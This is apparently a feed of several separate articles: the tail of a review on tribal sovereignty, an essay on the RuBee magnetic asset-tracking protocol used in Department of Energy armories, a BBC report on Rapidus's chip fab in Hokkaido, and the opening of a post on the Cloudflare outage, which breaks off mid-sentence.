Last March, Trump struck down a Biden executive order intended to strengthen tribal sovereignty. Yet even Biden’s order reads as aspirational; it suggested that the government consult with tribes “to ensure that Federal laws, policies, practices, and programs support Tribal Nations more effectively,” but consultation is not law. Deb Haaland, the Laguna Pueblo congresswoman from New Mexico who under Biden became the first indigenous secretary of the interior, oversaw the long-overdue accounting of the barbaric government-run Indian reservation boarding schools, including the uncovering of almost a thousand often unmarked graves. But in 2023, in that same position, she permitted ConocoPhillips’s $8 billion drilling plan on Alaska’s North Slope, the largest oil drilling project on public lands in US history, over the concerns of the Iñupiat mayor closest to the site, who noted that the previous year, during an uncontrolled ConocoPhillips gas release (“a unique event, with nothing similar ever occurring,” the corporation insisted), employees were evacuated while village residents were told they were safe.

This is not to say that the Trump administration, which aims to defund the federal agencies tribes rely on, won’t be worse than Biden. The government shutdown itself highlights the way the federal government funds its trust and treaty obligations through discretionary as opposed to mandatory funding for tribes, already the least well-funded among us, and the rush to extract everything from oil to rare earth minerals will hit indigenous lands hardest. But then the US government has a long, bipartisan, Constitution-sanctioned history of both taking Native territory and destroying it, denying imprisoned Native children their language in the process. Emanuel cites the United Nations special rapporteur on the rights of indigenous peoples, Victoria Tauli-Corpuz, who, after visiting western tribes in 2017, critiqued the US’s disregard for tribal sovereignty:

Sadly, I found the situation faced by the Standing Rock Sioux Tribe is shared by many other indigenous communities in the United States, as tribal communities nationwide wrestle with the realities of living in ground zero of energy impact.

The Boldt decision looked hard at a complicated history to map a new future for Native rights—and it worked. It is often cited as a first step toward the UN’s adoption in 2007 of the Declaration on the Rights of Indigenous Peoples. (The US was one of four “no” votes and the last holdout until late 2010, when Barack Obama agreed to support it, if only as an aspiration.) The autonomy allowed by Boldt helped the Olympic Peninsula’s Lower Elwha Klallam Tribe, whose elders had signed one of Stevens’s treaties, to, by 2014, take down the salmon-blocking dams that had been built on the Elwha River in 1910 by investors from Winnipeg and Chicago to power pulp mills. In 2023 the tribe held its first ceremonial salmon catch in decades. In California and Oregon, where the Yurok Tribe used its Boldt-era legal victories to regain its land and eventually take down dams on the Klamath River, salmon took only about a week to find their way to tributaries that had not had salmon in them for over half a century. “It feels like catharsis. It feels like we are on the right path. It gives me hope for the future,” Barry McCovey Jr., the director of the Yurok Tribe’s fisheries department, told the Associated Press .

Hope is a rare commodity, but if there is hope for the earth, generally it has to do with acknowledging indigenous sovereignty in the face of insatiable resource extraction. Indigenous people make up 6 percent of the world’s population, but their territory accounts for close to a quarter of the earth’s land surface, containing more than a third of remaining natural lands worldwide, often in northern boreal and equatorial forests. Tribes have built up a body of Indian law that is as dynamic as it is unacknowledged. “Tribal sovereignty is one of the most powerful and valuable public ideas that has ever touched my mind,” Wilkinson writes.

I say that, not just because of tribal sovereignty’s legal and intellectual worth, but because it also has proved to be so invincible. The world’s most powerful nation tried to terminate tribal sovereignty over the course of many generations, but could not because it meant so much to Indian people, small minority that they were, and they refused to give in.


Robert Sullivan ’s books include Rats , The Meadowlands , and A Whale Hunt . His latest, Double Exposure: Resurveying the West with Timothy O’Sullivan, America’s Most Mysterious War Photographer , was published last year. (December 2025)


RuBee

Hacker News
computer.rip
2025-11-24 03:08:10
Comments...
Original Article

I have at least a few readers for which the sound of a man's voice saying "government cell phone detected" will elicit a palpable reaction. In Department of Energy facilities across the country, incidences of employees accidentally carrying phones into secure areas are reduced through a sort of automated nagging. A device at the door monitors for the presence of a tag; when the tag is detected it plays an audio clip. Because this is the government, the device in question is highly specialized, fantastically expensive, and says "government cell phone" even though most of the phones in question are personal devices. Look, they already did the recording, they're not changing it now!

One of the things that I love is weird little wireless networks. Long ago I wrote about ANT+ , for example, a failed personal area network standard designed mostly around fitness applications. There's tons of these, and they have a lot of similarities---so it's fun to think about the protocols that went down a completely different path. It's even better, of course, if the protocol is obscure outside of an important niche. And a terrible website, too? What more could I ask for.

The DoE's cell-phone nagging boxes, and an array of related but more critical applications, rely on an unusual personal area networking protocol called RuBee.

RuBee is a product of Visible Assets Inc., or VAI, founded in 2004 by John K. Stevens. Stevens seems a somewhat improbable founder, with a background in biophysics and eye health, but he's a repeat entrepreneur. He's particularly fond of companies called Visible: he founded Visible Assets after his successful tenure as CEO of Visible Genetics. Visible Genetics was an early innovator in DNA sequencing, and still provides a specialty laboratory service that sequences samples of HIV in order to detect vulnerabilities to antiretroviral medications.

Clinical trials in the early 2000s exposed Visible Genetics to one of the more frustrating parts of health care logistics: refrigeration. Samples being shipped to the lab and reagents shipped out to clinics were both temperature sensitive. Providers had to verify that these materials had stayed adequately cold throughout shipping and handling, otherwise laboratory results could be invalid or incorrect. Stevens became interested in technical solutions to these problems; he wanted some way to verify that samples were at acceptable temperatures both in storage and in transit.

Moreover, Stevens imagined that these sensors would be in continuous communication. There's a lot of overlap between this application and personal area networks (PANs), protocols like Bluetooth that provide low-power communications over short ranges. There is also clear overlap with RFID; you can buy RFID temperature sensors. VAI, though, coined the term visibility network to describe RuBee. That's visibility as in asset visibility: somewhat different from Bluetooth or RFID, RuBee as a protocol is explicitly designed for situations where you need to "keep tabs" on a number of different objects. Despite the overlap with other types of wireless communications, the set of requirements on a visibility network have led RuBee down a very different technical path.

Visibility networks have to be highly reliable. When you are trying to keep track of an asset, a failure to communicate with it represents a fundamental failure of the system. For visibility networks, the ability to actually convey a payload is secondary: the main function is just reliably detecting that endpoints exist. Visibility networks have this in common with RFID, and indeed, despite its similarities to technologies like BLE RuBee is positioned mostly as a competitor to technologies like UHF RFID.

There are several differences between RuBee and RFID; for example, RuBee uses active (battery-powered) tags and the tags are generally powered by a complete 4-bit microcontroller. That doesn't necessarily sound like an advantage, though. While RuBee tags advertise a battery life of "5-25 years", the need for a battery seems mostly like a liability. The real feature is what active tags enable: RuBee operates in the low frequency (LF) band, typically at 131 kHz.

At that low frequency, the wavelength is very long, about 2.5 km. With such a long wavelength, RuBee communications all happen at much less than one wavelength in range. RF engineers refer to this as near-field operation, and it has some properties that are intriguingly different from more typical far-field RF communications. In the near-field, the magnetic field created by the antenna is more significant than the electrical field. RuBee devices are intentionally designed to emit very little electrical RF signal. Communications within a RuBee network are achieved through magnetic, not electrical fields. That's the core of RuBee's magic.

The idea of magnetic coupling is not unique to RuBee. Speaking of the near-field, there's an obvious comparison to NFC which works much the same way. The main difference, besides the very different logical protocols, is that NFC operates at 13.56 MHz. At this higher frequency, the wavelength is only around 20 meters. The requirement that near-field devices be much closer than a full wavelength leads naturally to NFC's very short range, typically specified as 4 cm.
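
To put rough numbers on that comparison, the free-space wavelength is just the speed of light divided by the frequency. Here's a minimal back-of-the-envelope sketch in Python; the rounded constant and the arithmetic are mine, not anything from VAI or the standard:

# Back-of-the-envelope check on the wavelength comparison above (my own
# arithmetic): wavelength = c / frequency.
C = 3.0e8  # speed of light in m/s, rounded

for name, freq_hz in (("RuBee (LF)", 131_072), ("NFC (HF)", 13_560_000)):
    print(f"{name}: {freq_hz} Hz -> ~{C / freq_hz:,.0f} m wavelength")

# Prints roughly 2,289 m for RuBee and 22 m for NFC: kilometres versus tens
# of metres, which is the whole near-field story in one division.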

At LF frequencies, RuBee can achieve magnetic coupling at ranges up to about 30 meters. That's a range comparable to, and often much better than, RFID inventory tracking technologies. Improved range isn't RuBee's only benefit over RFID. The properties of magnetic fields also make it a more robust protocol. RuBee promises significantly less vulnerability to shielding by metal or water than RFID.

There are two key scenarios where this comes up: the first is equipment stored in metal containers or on metal shelves, or equipment that is itself metallic. In that scenario, it's difficult to find a location for an RFID tag that won't suffer from shielding by the container. The case of water might seem less important, but keep in mind that people are made mostly of water. RFID reading is often unreliable for objects carried on a person, which are likely to be shielded from the reader by the water content of the body.

These problems are not just theoretical. WalMart is a major adopter of RFID inventory technology, and in early rollouts struggled with low successful read rates. Metal, moisture (including damp cardboard boxes), antenna orientation, and multipath/interference effects could cause read failure rates as high as 33% when scanning a pallet of goods. Low read rates are mostly addressed by using RFID "portals" with multiple antennas. Eight antennas used as an array greatly increase read rate, but at a cost of over ten thousand dollars per portal system. Even so, WalMart seems to now target a success rate of only 95% during bulk scanning.

95% might sound pretty good, but there are a lot of visibility applications where a failure rate of even a couple percent is unacceptable. These mostly go by the euphemism "high value goods," which depending on your career trajectory you may have encountered in corporate expense and property policies. High-value goods tend to be items that are both attractive to theft and where theft has particularly severe consequences. Classically, firearms and explosives. Throw in classified material for good measure.

I wonder if Stevens was surprised by RuBee's market trajectory. He came out of the healthcare industry and, it seems, originally developed RuBee for cold chain visibility... but, at least in retrospect, it's quite obvious that its most compelling application is in the armory.

Because RuBee tags are small and largely immune to shielding by metals, you can embed them directly in the frames of firearms, or as an aftermarket modification you can mill out some space under the grip. RuBee tags in weapons will read reliably when they are stored in metal cases or on metal shelving, as is often the case. They will even read reliably when a weapon is carried holstered, close to a person's body.

Since RuBee tags incorporate an active microcontroller, there are even more possibilities. Temperature logging is one thing, but firearm-embedded RuBee tags can incorporate an accelerometer (NIST-traceable, VAI likes to emphasize) and actually count the rounds fired.


Sidebar time: there is a long history of political hazard around "smart guns." The term "smart gun" is mostly used more specifically for firearms that identify their user, for example by fingerprint authentication or detection of an RFID fob. The idea has become vague enough, though, that mention of a firearm with any type of RFID technology embedded would probably raise the specter of the smart gun to gun-rights advocates.

Further, devices embedded in firearms that count the number of rounds fired have been proposed for decades, if not a century, as a means of accountability. The holder of a weapon could, in theory, be required to positively account for every round fired. That could eliminate incidents of unreported use of force by police, for example. In practice I think this is less compelling than it sounds, simple counting of rounds leaves too many opportunities to fudge the numbers and conceal real-world use of a weapon as range training, for example.

That said, the NRA has long been vehemently opposed to the incorporation of any sort of technology into weapons that could potentially be used as a means of state control or regulation. The concern isn't completely unfounded; the state of New Jersey did, for a time, have legislation that would have made user-identifying "smart guns" mandatory if they were commercially available. The result of the NRA's strident lobbying is that no such gun has ever become commercially available; "smart guns" have been such a political third rail that any firearms manufacturer that dared to introduce one would probably face a boycott by most gun stores. For better or worse, a result of the NRA's powerful political advocacy in this area is that the concept of embedding security or accountability technology into weapons has never been seriously pursued in the US. Even a tentative step in that direction can produce a huge volume of critical press for everyone involved.

I bring this up because I think it explains some of why VAI seems a bit vague and cagey about the round-counting capabilities of their tags. They position it as purely a maintenance feature, allowing the armorer to keep accurate tabs on the preventative maintenance schedule for each individual weapon (in armory environments, firearm users are often expected to report how many rounds they fired for maintenance tracking reasons). The resistance of RuBee tags to concealment is only positioned as a deterrent to theft, although the idea of RuBee-tagged firearms creates obvious potential for security screening. Probably the most profitable option for VAI would be to promote RuBee-tagged firearms as a tool for enforcement of gun control laws, but this is a political impossibility and bringing it up at all could cause significant reputational harm, especially with the government as a key customer. The result is marketing copy that is a bit odd, giving a set of capabilities that imply an application that is never mentioned.


VAI found an incredible niche with their arms-tracking application. Institutional users of firearms, like the military, police, and security forces, are relatively price-insensitive and may have strict accounting requirements. By the mid-'00s, VAI was into the long sales cycle of proposing the technology to the military. That wasn't entirely unsuccessful. RuBee shot-counting weapon inventory tags were selected by the Naval Surface Warfare Center in 2010 for installation on SCAR and M4 rifles. That contract had a five-year term, it's unclear to me if it was renewed. Military contracting opened quite a few doors to VAI, though, and created a commercial opportunity that they eagerly pursued.

Perhaps most importantly, weapons applications required an impressive round of safety and compatibility testing. RuBee tags have the fairly unique distinction of military approval for direct attachment to ordnance, something called "zero separation distance" as the tags do not require a minimum separation from high explosives. Central to that certification are findings of intrinsic safety of the tags (that they do not contain enough energy to trigger explosives) and that the magnetic fields involved cannot convey enough energy to heat anything to dangerous temperatures.

That's not the only special certification that RuBee would acquire. The military has a lot of firearms, but military procurement is infamously slow and mercurial. Improved weapon accountability is, almost notoriously, not a priority for the US military, which has often had stolen weapons go undetected until their later use in crime. The Navy's interest in RuBee does not seem to have translated to more widespread military applications.

Then you have police departments, probably the largest institutional owners of firearms and a very lucrative market for technology vendors. But here we run into the political hazard: the firearms lobby is very influential on police departments, as are police unions which generally oppose technical accountability measures. Besides, most police departments are fairly cash-poor and are not likely to make a major investment in a firearms inventory system.

That leaves us with institutional security forces. And there is one category of security force that are particularly well-funded, well-equipped, and beholden to highly R&D-driven, almost pedantic standards of performance: the protection forces of atomic energy facilities.

Protection forces at privately-operated atomic energy facilities, such as civilian nuclear power plants, are subject to licensing and scrutiny by the Nuclear Regulatory Commission. Things step up further at the many facilities operated by the National Nuclear Security Administration (NNSA). Protection forces for NNSA facilities are trained at the Department of Energy's National Training Center, at the former Manzano Base here in Albuquerque. Concern over adequate physical protection of NNSA facilities has led Sandia National Laboratories to become one of the premier centers for R&D in physical security. Teams of scientists and engineers have applied sometimes comical scientific rigor to "guns, gates, and guards," the traditional articulation of physical security in the nuclear world.

That scope includes the evaluation of new technology for the management of protection forces, which is why Oak Ridge National Laboratory launched an evaluation program for the RuBee tagging of firearms in their armory. The white paper on this evaluation is curiously undated, but citations "retrieved 2008" lead me to assume that the evaluation happened right around the middle of the '00s. At the time, VAI seems to have been involved in some ultimately unsuccessful partnership with Oracle, leading to the branding of the RuBee system as Oracle Dot-Tag Server. The term "Dot-Tag" never occurs outside of very limited materials around the Oracle partnership, so I'm not sure if it was Oracle branding for RuBee or just some passing lark. In any case, Oracle's involvement seems to have mainly just been the use of the Oracle database for tracking inventory data---which was naturally replaced by PostgreSQL at Oak Ridge.

The Oak Ridge trial apparently went well enough, and around the same time, the Pantex Plant in Texas launched an evaluation of RuBee for tracking classified tools. Classified tools are a tricky category, as they're often metallic and often stored in metallic cases. During the trial period, Pantex tagged a set of sample classified tools with RuBee tags and then transported them around the property, testing the ability of the RuBee controllers to reliably detect them entering and exiting areas of buildings. Simultaneously, Pantex evaluated the use of RuBee tags to track containers of "chemical products" through the manufacturing lifecycle. Both seem to have produced positive results.

There are quite a few interesting and strange aspects of the RuBee system, a result of its purpose-built Visibility Network nature. A RuBee controller can have multiple antennas that it cycles through. RuBee tags remain in a deep-sleep mode for power savings until they detect a RuBee carrier during their periodic wake cycle. When a carrier is detected, they fully wake and listen for traffic. A RuBee controller can send an interrogate message and any number of tags can respond, with an interesting and novel collision detection algorithm used to ensure reliable reading of a large number of tags.
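
The standard itself is terse, but the interrogation cycle is easy to picture. Here's a minimal toy sketch of that loop in Python; every class, field, and value in it is invented for illustration and should not be read as the actual IEEE 1902.1 behaviour or VAI firmware:

import random

# Toy model of the cycle described above: a controller cycles its antennas,
# tags wake when they detect a carrier, and every awake tag replies with a
# randomly phase-shifted response that stands in for the anti-collision scheme.

class Tag:
    def __init__(self, address):
        self.address = address
        self.asleep = True   # tags spend most of their life in deep sleep

    def wake_on_carrier(self):
        self.asleep = False  # the periodic wake cycle notices the carrier

    def respond(self):
        # Random "phase" is a placeholder for the phase offsets that let a
        # real controller untangle simultaneous replies.
        return {"address": self.address, "phase": random.random()}

class Controller:
    def __init__(self, tags_by_antenna):
        self.tags_by_antenna = tags_by_antenna

    def inventory(self):
        seen = set()
        for antenna, tags in self.tags_by_antenna.items():  # cycle antennas
            for tag in tags:
                tag.wake_on_carrier()
                seen.add(tag.respond()["address"])
        return seen

controller = Controller({
    "loop-A": [Tag("10.1.4.1"), Tag("10.1.4.2")],
    "loop-B": [Tag("10.1.4.3")],
})
print(sorted(controller.inventory()))  # -> ['10.1.4.1', '10.1.4.2', '10.1.4.3']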

The actual RuBee protocol is quite simple, and can also be referred to as IEEE 1902.1 since the decision of VAI to put it through the standards process. Packets are small and contain basic addressing info, but they can also contain arbitrary payload in both directions, perfect for data loggers or sensors. RuBee tags are identified by something that VAI oddly refers to as an "IP address," causing some confusion over whether or not VAI uses IP over 1902.1. They don't, I am confident saying after reading a whole lot of documents. RuBee tags, as standard, have three different 4-byte addresses. VAI refers to these as "IP, subnet, and MAC," but these names are more like analogies. Really, the "IP address" and "subnet" are both configurable arbitrary addresses, with the former intended for unicast traffic and the latter for broadcast. For example, you would likely give each asset a unique IP address, and use subnet addresses for categories or item types. The subnet address allows a controller to interrogate for every item within that category at once. The MAC address is a fixed, non-configurable address derived from the tag's serial number. They're all written in the formats we associate with IP networks, dotted-quad notation, as a matter of convenience.
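
To make the three-address scheme concrete, here's a small hypothetical sketch of how client software might model it. The field names and example values are mine; only the dotted-quad convention and the unicast/broadcast/serial-number roles come from the description above:

from dataclasses import dataclass

@dataclass
class RuBeeAddresses:
    # Three arbitrary 4-byte values written dotted-quad style. Despite the
    # names, nothing here implies IP networking over 1902.1.
    ip: str      # configurable, unicast address for one specific asset
    subnet: str  # configurable, shared by a category for broadcast polls
    mac: str     # fixed, derived from the tag's serial number

rifle_tag = RuBeeAddresses(ip="10.1.4.27", subnet="10.1.4.0", mac="0.17.203.9")

def answers(tag: RuBeeAddresses, query: str) -> bool:
    """Would an interrogation addressed to `query` get a reply from this tag?"""
    return query in (tag.ip, tag.subnet, tag.mac)

print(answers(rifle_tag, "10.1.4.0"))  # True: subnet poll for the whole category
print(answers(rifle_tag, "10.9.9.9"))  # False: some other asset's unicast address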

And that's about it as far as the protocol specification goes, besides of course the physical details: a 131,072 Hz carrier, a 1,024 Hz data clock, and either ASK or BPSK modulation. The specification also describes an interesting mode called "clip," in which a set of multiple controllers interrogate in exact synchronization and all tags then reply in exact synchronization. Somewhat counter-intuitively, this works well, because RuBee controllers can separate out multiple simultaneous tag transmissions using an anti-collision algorithm based on random phase shifts by each tag. It allows a room, say an armory, full of RuBee controllers to rapidly interrogate the entire contents of the room. I think this feature may have been added after the Oak Ridge trials...

RuBee is quite slow, typically 1,200 baud, so inventorying a large number of assets can take a while (Oak Ridge found that their system could only collect data on 2-7 tags per second per controller). But it's so robust that it can achieve a 100% read rate in some very challenging scenarios. Evaluation by the DoE and the military produced impressive results. You can read, for example, of a military experiment in which a RuBee antenna embedded in a roadway reliably identified rifles secured in steel containers in passing Humvees.
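
To get a feel for what those read rates mean in practice, here is a quick, purely illustrative calculation; the 500-item armory is an assumption of mine, while the 2-7 tags per second figure is Oak Ridge's:

# Purely illustrative: how long one controller takes to inventory a 500-item
# armory at Oak Ridge's observed 2-7 tags per second.
items = 500
for tags_per_second in (2, 7):
    minutes = items / tags_per_second / 60
    print(f"{tags_per_second} tags/s -> about {minutes:.1f} minutes")

# Roughly 1.2 to 4.2 minutes per controller: slow next to bulk UHF RFID
# scanning, but tolerable when a 100% read rate is the whole point.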

Paradoxically, then, one of the benefits of RuBee in the military/defense context is that it is also difficult to receive. Here is RuBee's most interesting trick: somewhat oversimplified, the strength of an electrical radio signal goes as 1/r, while the strength of a magnetic field goes as 1/r^3. RuBee equipment is optimized, by antenna design, to produce a minimal electrical field. The result is that RuBee tags can very reliably be contacted at short range (say, around ten feet), but are virtually impossible to contact or even detect at ranges over a few hundred feet. To the security-conscious buyer, this is a huge feature. RuBee tags are highly resistant to communications or electronic intelligence collection.
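
Taking that oversimplified scaling at face value, a couple of lines of arithmetic show why "reliable at ten feet, undetectable at a few hundred" falls naturally out of the exponent. This is just the stated 1/r versus 1/r^3 model, not a real link-budget calculation:

# Relative signal strength under the simplified model above: far-field
# electric signal ~ 1/r, near-field magnetic coupling ~ 1/r^3.
reference_ft = 10  # a range at which a controller reads the tag reliably
for range_ft in (10, 100, 300):
    ratio = range_ft / reference_ft
    electric = 1 / ratio       # 1/r
    magnetic = 1 / ratio ** 3  # 1/r^3
    print(f"{range_ft:>3} ft: electric x{electric:.4f}, magnetic x{magnetic:.6f}")

# Going from 10 ft to 300 ft costs a factor of 30 for the 1/r signal but a
# factor of 27,000 for the magnetic coupling, which is why the tags are so
# hard to detect, let alone exfiltrate, from outside a building.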

Consider the logical implications of tagging the military's rifles. With conventional RFID, range is limited by the size and sensitivity of the antenna. Particularly when tags are incidentally powered by a nearby reader, an adversary with good equipment can detect RFID tags at very long range. VAI heavily references a 2010 DEFCON presentation, for example, that demonstrated detection of RFID tags at a range of 80 miles. One imagines that opportunistic detection by satellite is feasible for a state intelligence agency. That means that your rifle asset tracking is also revealing the movements of soldiers in the field, or at least providing a way to detect their approach.

Most RuBee tags have their transmit power reduced by configuration, so even the maximum 100' range of the protocol is not achievable. VAI suggests that typical RuBee tags cannot be detected by radio direction finding equipment at ranges beyond 20', and that this range can be made shorter by further reducing transmit power.

Once again, we have caught the attention of the Department of Energy. Because of the short range of RuBee tags, they have generally been approved as not representing a COMSEC or TEMPEST hazard to secure facilities. And that brings us back to the very beginning: why does the DoE use a specialized, technically interesting, and largely unique radio protocol to fulfill such a basic function as nagging people that have their phones? Because RuBee's security properties have allowed it to be approved for use adjacent to and inside of secure facilities. A RuBee tag, it is thought, cannot be turned into a listening device because the intrinsic range limitation of magnetic coupling will make it impossible to communicate with the tag from outside of the building. It's a lot like how infrared microphones still see some use in secure facilities, but so much more interesting!

VAI has built several different product lines around RuBee, with names like Armory 20/20 and Shot Counting Allegro 20/20 and Store 20/20. The founder started his career in eye health, remember. None of them are that interesting, though. They're all pretty basic CRUD applications built around polling multiple RuBee controllers for tags in their presence.

And then there's the "Alert 20/20 DoorGuard:" a metal pedestal with a RuBee controller and audio announcement module, perfect for detecting government cell phones.

One of the strangest things about RuBee is that it's hard to tell if it's still a going concern. VAI's website has a press release section, where nothing has been posted since 2019. The whole website feels like it was last revised even longer ago. When RuBee was newer, back in the '00s, a lot of industry journals covered it with headlines like "the new RFID." I think VAI was optimistic that RuBee could displace all kinds of asset tracking applications, but despite some special certifications in other fields (e.g. approval to use RuBee controllers and tags around pacemakers in surgical suites), I don't think RuBee has found much success outside of military applications.

RuBee's resistance to shielding is impressive, but RFID read rates have improved considerably with new DSP techniques, antenna array designs, and the generally reduced cost of modern RFID equipment. RuBee's unique advantages, its security properties and resistance to even intentional exfiltration, are interesting but not worth much money to buyers other than the military.

So that's the fate of RuBee and VAI: defense contracting. As far as I can tell, RuBee and VAI are about as vital as they have ever been, but RuBee is now installed as just one part of general defense contracts around weapons systems, armory management, and process safety and security. IEEE standardization has opened the door to use of RuBee by federal contractors under license, and indeed, Lockheed Martin is repeatedly named as a licensee, as are firearms manufacturers with military contracts like Sig Sauer.

Besides, RuBee continues to grow closer to the DoE. In 2021, VAI appointed Lisa Gordon-Hagerty to its board of directors. Gordon-Hagerty was undersecretary of Energy and had led the NNSA until the year before. This year, the New Hampshire Small Business Development Center wrote a glowing profile of VAI. They described it as a 25-employee company with a goal of hitting $30 million in annual revenue in the next two years.

Despite the outdated website, VAI claims over 1,200 RuBee sites in service. I wonder how many of those are Alert 20/20 DoorGuards? Still, I do believe there are military weapons inventory systems currently in use. RuBee probably has a bright future, as a niche technology for a niche industry. If nothing else, they have legacy installations and intellectual property to lean on. A spreadsheet of VAI-owned patents on RuBee, with nearly 200 rows, encourages would-be magnetically coupled visibility network inventors not to go it on their own. I just wish I could get my hands on a controller....

Japan's gamble to turn island of Hokkaido into global chip hub

Hacker News
www.bbc.com
2025-11-24 03:07:07
Comments...
Original Article

Suranjana Tewari Asia business correspondent, Hokkaido, Japan

Getty Images: Colorful scenery of the flower garden at Shikisai-no-oka, Biei, Hokkaido, Japan

Hokkaido is a tourism and agricultural region, but Rapidus is making chips there too

The island of Hokkaido has long been an agricultural powerhouse – now Japan is investing billions to turn it into a global hub for advanced semiconductors.

More than half of Japan's dairy produce comes from Hokkaido, the northernmost of its main islands. In winter, it's a wonderland of ski resorts and ice-sculpture festivals; in summer, fields bloom with bands of lavender, poppies and sunflowers.

These days, cranes are popping up across the island – building factories, research centres and universities focused on technology. It's part of Japan's boldest industrial push in a generation: an attempt to reboot the country's chip-making capabilities and reshape its economic future.

Locals say that beyond the cattle and tourism, Hokkaido has long lacked other industries. There's even a saying that those who go there do so only to leave.

But if the government succeeds in turning Hokkaido into Japan's answer to Silicon Valley - or "Hokkaido Valley", as some have begun to call it - the country could become a new contender in the $600bn (£458bn) race to supply the world's computer chips.

An unlikely player

At the heart of the plan is Rapidus, a little-known company backed by the government and some of Japan's biggest corporations including Toyota, Softbank and Sony.

Born out of a partnership with IBM, it has raised billions of dollars to build Japan's first cutting-edge chip foundry in decades.

The government has invested $12bn in the company, so that it can build a massive semiconductor factory or "fab" in the small city of Chitose.

In selecting the Hokkaido location, Rapidus CEO Atsuyoshi Koike points to Chitose's water, electricity infrastructure and its natural beauty.

Mr Koike oversaw the fab design, which will be completely covered in grass to harmonise with Hokkaido's landscape, he told the BBC.

Local authorities have also flagged the region as being at lower risk of earthquakes compared to other potential sites in Japan.

A key milestone for Rapidus came with the delivery of an extreme ultraviolet lithography (EUV) system from the Dutch company ASML.

The high-tech machinery helped bring about Rapidus' biggest accomplishment yet earlier this year – the successful production of prototype two nanometre (2nm) transistors.

These ultra-thin chips are at the cutting edge of semiconductor technology and allow devices to run faster and more efficiently.

It's a feat only rival chip makers TSMC and Samsung have accomplished. Intel is not pursuing 2nm; it is leapfrogging from 7nm straight to 1.8nm.

"We succeeded in manufacturing the 2nm prototype for the first time in Japan, and at an unprecedented speed in Japan and globally," Mr Koike said.

He credits the IBM partnership for helping achieve the breakthrough.

Tie-ups with global companies are essential to acquiring the technology needed for this level of chips, he added.

The sceptics

Rapidus is confident that it is on track to mass produce 2nm chips by 2027. The challenge will be achieving the yield and quality that is needed to survive in an incredibly competitive market – the very areas where Taiwan and South Korea have pulled ahead.

TSMC for example has achieved incredible success in mass production, but making high-end chips is costly and technically demanding.

In a 2024 report, the Asean+3 Macroeconomic Research Office highlighted that although Rapidus is receiving government subsidies and consortium members are contributing funds: "The financing falls short of the expected 5 trillion yen ($31.8bn; £24.4bn) needed to start mass production."

The Center for Strategic and International Studies (CSIS) has previously said: "Rapidus has no experience in manufacturing advanced chips, and to date there is no indication that it will be able to access actual know-how for such an endeavour from companies with the requisite experience (ie TSMC and Samsung)."

Finding customers may also be a challenge – Samsung and TSMC have established relationships with global companies that have been buying their chips for years.

The lost decades

Nevertheless, Japan's government is pouring money into the chip industry - $27bn between 2020 and early 2024 - a larger commitment relative to its gross domestic product (GDP) than the US made through the Biden-era CHIPS Act.

In late 2024, Tokyo unveiled a $65bn package for Artificial Intelligence (AI) and semiconductors that could further support Rapidus's expansion plans.

This comes after decades of decline. Forty years ago Japan made more than half of the world's semiconductors. Today, it produces just over 10%.

Many point to US-Japan trade tensions in the 1980s as a turning point.

Naoyuki Yoshino, professor emeritus at Keio University, said Japan lost out in the technology stakes to Taiwan and South Korea in the 1980s, leaving domestic companies weaker.

Unlike its rivals, Japan failed to sustain subsidies to keep its chipmakers competitive.

But Mr Koike says that mentality has changed.

"The [national] government and local government are united in supporting our industry to revive once again."

Construction of a new semiconductor factory by Rapidus Corp. in Chitose, Hokkaido (Getty Images)

Rapidus has already achieved a production prototype of a 2nm chip

Japan's broader economic challenges also loom large. Its population is shrinking while the number of elderly citizens continues to surge. That has determined the national budget for years and has contributed to slowing growth.

More than a third of its budget now goes to social welfare for the elderly, and that squeezes the money available for research, education and technology, Prof Yoshino says.

Japan also faces a severe shortage of semiconductor engineers – an estimated 40,000 people in the coming years.

Rapidus is partnering with Hokkaido University and others to train new workers, but agrees it will have to rely heavily on foreigners, at a time when public support for workers coming into the country for employment is low.

Growing an ecosystem

The government's push is already attracting major global players.

TSMC is producing 12–28nm chips in Kumamoto, on the south-western island of Kyushu - a significant step for Japan, even if it lags behind the company's cutting-edge production in Taiwan.

The expansion has transformed the local economy, attracting suppliers, raising wages, and leading to infrastructure and service developments.

Japan's broader chip revival strategy appears to be following a playbook: establish a "fab", and an entire ecosystem will tend to follow.

TSMC started building a second plant on Kyushu in October this year, which is due to begin production by the end of 2027.

Beyond Rapidus and TSMC, local players like Kioxia and Toshiba are also getting government backing.

Kioxia has expanded fabs in Yokkaichi and Kitakami with state funds and Toshiba has built one in Ishikawa. Meanwhile, ROHM has been officially designated as a company that provides critical products under Tokyo's economic security framework.

American memory chipmaker Micron will also receive $3.63bn in subsidies from the Japanese government to grow facilities in Hiroshima, while Samsung is building a research and development facility in Yokohama.

Hokkaido is seeing similar momentum. Chipmaking equipment companies ASML and Tokyo Electron have both opened offices in Chitose, off the back of Rapidus building a production facility there.

"This will make a form of 'global ecosystem'," Mr Koike says, "where we work together to be able to produce semiconductors that contribute to the world."

Rapidus Corporation President Atsuyoshi Koike bows during a press conference in Tokyo (Getty Images)

The CEO of Rapidus says the firm's edge is bespoke chips that can be delivered quickly

Mr Koike said Rapidus's key selling point would be - as its name suggests - an ability to produce custom chips faster than competitors, rather than competing directly with other players.

"TSMC leads the world, with Intel and Samsung close behind. Our edge is speed - we can produce and deliver chips three to four times faster than anyone else. That speed is what gives us an edge in the global semiconductor race," Mr Koike said.

Big bet

Global demand for chips is surging with the rise of AI, while Japan's automakers - still recovering from pandemic-era supply shocks - are pressing for more reliable, domestically or regionally sourced production across the entire supply chain, from raw materials to finished chips.

Securing control over chip manufacturing is being seen as a national security priority, both in Japan and elsewhere, as recent trade frictions and geopolitical tensions between China and Taiwan raise concerns around the risks of relying on foreign suppliers.

"We'd like to provide products from Japan once again – products that are powerful and with great new value," Mr Koike said.

For Japan's government, investing in Rapidus is a high-stakes gamble to revive its semiconductor industry and more broadly its tech power.

And some analysts say it may be the country's best chance to build a domestic ecosystem to supply advanced chips to its many manufacturers, and one day become a formidable challenger in the global market.

Additional reporting by Jaltson Akkanath Chummar

The Cloudflare outage was a good thing

Hacker News
gist.github.com
2025-11-24 03:04:10
Comments...
Original Article

Cloudflare, the CDN provider, suffered a massive outage today. Some of the world's most popular apps and web services were left inaccessible for several hours whilst the Cloudflare team scrambled to fix a whole swathe of the internet.

And that might be a good thing.

The proximate cause of the outage was pretty mundane: a bad config file triggered a latent bug in one of Cloudflare's services. The file was too large (details still hazy) and this led to a cascading failure across Cloudflare operations. Probably there is some useful post-morteming about canary releases and staged rollouts.

But the bigger problem, the ultimate cause, behind today's chaos is the creeping centralisation of the internet and a society that is sleepwalking into assuming the net is always on and always working.

It's not just "trivial" stuff like Twitter and League of Legends that were affected, either. A friend of mine remarked caustically about his experience this morning:

